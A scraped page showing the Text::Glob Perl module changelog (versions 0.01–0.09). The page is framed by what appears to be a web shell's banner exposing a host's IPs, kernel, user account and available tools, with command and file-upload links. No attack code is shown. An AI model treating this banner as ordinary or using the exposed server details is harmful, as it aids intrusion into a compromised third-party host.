Server IP : 111.118.215.189 / Your IP : 216.73.216.162 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /proc/self/root/usr/share/doc/perl-Text-Glob-0.09/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
0.09 Tuesday 22nd February, 2010 Compiled documentation fixes (collected by Tom Hukins from fixes on rt.cpan) 0.08 Wednesday 2nd May, 2007 Expose glob_to_regex_string (Joshua Hoblitt) 0.07 Friday 14th July, 2006 Explictly quote @ and %. Though they don't really need it to work normally, it's needed for when you roundtrip the regex back into text (like File::Find::Rule does). 0.06 Monday 1st September, 2003 - port to Module::Build - Nested alternations fix from Mike Benson 0.05 15th August, 2002 - !match_glob("*.foo", "foo/.foo"); - test suite overhaul - backslash expansion fixed - /[+^$|]/ made less 'special' - handle embedded newlines in glob patterns - add tests for 'foo[abc]' - Many thanks go to Nick Cleaton for finding these 0.04 14th August, 2002 - $Text::Glob::{strict_leading_dot,strict_wildcard_slash} from bug report from Nick Cleaton - (quite poor) documentation of supported globbing constructs 0.03 2nd August, 2002 - complete work of 0.02 by escaping ) too. bug found by Andy Lester 0.02 29th July, 2002 - fix handling of ( and ? tokens 0.01 21st July 2002 - initital release